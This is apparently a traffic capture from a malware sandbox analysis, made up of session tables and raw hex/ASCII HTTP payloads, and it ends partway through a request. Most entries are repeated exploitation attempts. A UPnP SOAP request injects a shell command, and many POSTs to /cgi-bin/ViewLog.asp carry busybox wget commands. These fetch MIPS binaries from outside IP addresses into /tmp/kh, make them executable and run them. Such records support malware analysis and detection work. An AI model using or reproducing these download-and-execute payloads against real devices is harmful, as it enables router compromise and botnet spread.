                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              455192.168.2.135227431.222.200.488080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:34.977797985 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              456192.168.2.134823031.136.119.918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:35.008821964 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:38.086257935 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:44.230266094 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.262227058 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.326186895 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              457192.168.2.135974694.121.181.1718080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:35.045658112 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:39.110282898 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:45.254261017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.286216021 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.374218941 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              458192.168.2.134676461.139.119.21923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:36.528562069 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 33 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:30Auth Result: .
                                              Nov 23, 2023 05:17:37.645098925 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 33 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:30Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              459192.168.2.135388694.121.77.1708080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:36.533279896 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              460192.168.2.135931894.122.108.2508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:36.533368111 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:37.702259064 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:39.078263998 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.926250935 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.558284044 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:58.566220999 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.374203920 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              461192.168.2.135306894.122.3.2518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:36.533411026 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:37.702265024 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:39.078268051 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.926254988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
